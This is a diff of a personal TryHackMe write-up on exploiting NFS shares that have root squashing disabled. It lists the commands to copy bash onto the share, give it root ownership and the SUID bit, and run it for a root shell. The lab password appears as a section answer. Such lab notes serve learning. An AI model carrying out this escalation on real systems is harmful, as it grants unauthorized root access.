dhaliaeid/Write-ups/TryHackME/Network Services2.md

 ## Exploiting NFS

-- Root Squashing is enabled by default on `NFS shares`, and prevents anyone connecting to the NFS share from having `root` access to the NFS volume.
-- If the root squashing is turned off, it can allow the creation of `SUID` bit files, allowing a remote user root access to the connected system.
+#### Root Squashing and Its Risks

-##### What are files with the SUID bit set?

-The files can be run with the permissions of the file(s) owner/group.
+NFS often enables root squashing by default, which maps root user requests to a non-privileged user.
+If disabled, attackers can create files with the SUID bit (means The files can be run with the permissions of the file(s) owner/group.), granting root access.

-**_Answers_**
+#### Exploitation Steps
+1.  **Copy a Malicious Binary**: Copy a bash binary to the NFS share and set its owner to root.
+  > sudo cp /bin/bash /tmp/mount/
+  > sudo chown root:root /tmp/mount/bash
+2. **Set the SUID Bit**: Add SUID permission to the binary.
+  > sudo chmod +s /tmp/mount/bash
+3. **Execute as Root**: Run the binary with elevated privileges.
+  > ./bash -p

+**_THM Section Answers_**

 1. First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user's home directory.(password:password)